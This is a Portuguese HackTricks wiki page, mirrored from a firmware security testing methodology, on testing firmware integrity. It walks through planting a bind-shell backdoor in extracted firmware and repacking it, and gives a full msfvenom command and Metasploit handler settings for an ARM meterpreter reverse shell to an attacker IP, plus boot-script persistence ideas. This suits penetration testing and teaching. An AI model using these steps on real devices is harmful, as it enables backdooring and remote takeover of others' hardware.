Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-12-21 02:23:30 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/physical-attacks/firmware-analysis/firmware-integrity.md

5.5 KiB
Raw Blame History

Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras formas de apoiar o HackTricks:

Esta página foi copiada de https://scriptingxss.gitbook.io/firmware-security-testing-methodology/

Tente fazer upload de firmware personalizado e/ou binários compilados para verificar falhas de integridade ou assinatura. Por exemplo, compile um backdoor bind shell que inicie na inicialização usando os seguintes passos.

  1. Extraia o firmware com o firmware-mod-kit (FMK)
  2. Identifique a arquitetura e a endianness do firmware alvo
  3. Construa um compilador cruzado com o Buildroot ou use outros métodos que se adequem ao seu ambiente
  4. Use o compilador cruzado para construir o backdoor
  5. Copie o backdoor para o /usr/bin do firmware extraído
  6. Copie o binário QEMU apropriado para o rootfs do firmware extraído
  7. Emule o backdoor usando chroot e QEMU
  8. Conecte-se ao backdoor via netcat
  9. Remova o binário QEMU do rootfs do firmware extraído
  10. Reempacote o firmware modificado com o FMK
  11. Teste o firmware com backdoor emulando com o firmware analysis toolkit (FAT) e conectando-se ao IP e porta do backdoor alvo usando netcat

Se um shell root já foi obtido a partir de análise dinâmica, manipulação do bootloader ou testes de segurança de hardware, tente executar binários maliciosos pré-compilados como implantes ou reverse shells. Considere usar ferramentas automatizadas de payload/implante usadas para frameworks de comando e controle (C&C). Por exemplo, o framework Metasploit e o msfvenom podem ser aproveitados usando os seguintes passos.

  1. Identifique a arquitetura e a endianness do firmware alvo
  2. Use msfvenom para especificar o payload alvo apropriado (-p), IP do host atacante (LHOST=), número da porta de escuta (LPORT=), tipo de arquivo (-f), arquitetura (--arch), plataforma (--platform linux ou windows) e o arquivo de saída (-o). Por exemplo, msfvenom -p linux/armle/meterpreter_reverse_tcp LHOST=192.168.1.245 LPORT=4445 -f elf -o meterpreter_reverse_tcp --arch armle --platform linux
  3. Transfira o payload para o dispositivo comprometido (por exemplo, execute um servidor web local e use wget/curl para transferir o payload para o sistema de arquivos) e garanta que o payload tenha permissões de execução
  4. Prepare o Metasploit para lidar com solicitações de entrada. Por exemplo, inicie o Metasploit com msfconsole e use as seguintes configurações de acordo com o payload acima: use exploit/multi/handler,
  • set payload linux/armle/meterpreter_reverse_tcp
  • set LHOST 192.168.1.245 #IP do host atacante
  • set LPORT 445 #pode ser qualquer porta não utilizada
  • set ExitOnSession false
  • exploit -j -z
  1. Execute o meterpreter reverse 🐚 no dispositivo comprometido
  2. Observe as sessões do meterpreter se abrindo
  3. Realize atividades de pós-exploração

Se possível, identifique uma vulnerabilidade dentro dos scripts de inicialização para obter acesso persistente a um dispositivo após reinicializações. Tais vulnerabilidades surgem quando scripts de inicialização referenciam, linkam simbolicamente, ou dependem de código localizado em locais montados não confiáveis, como cartões SD e volumes flash usados para armazenar dados fora dos sistemas de arquivos raiz.

Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras formas de apoiar o HackTricks: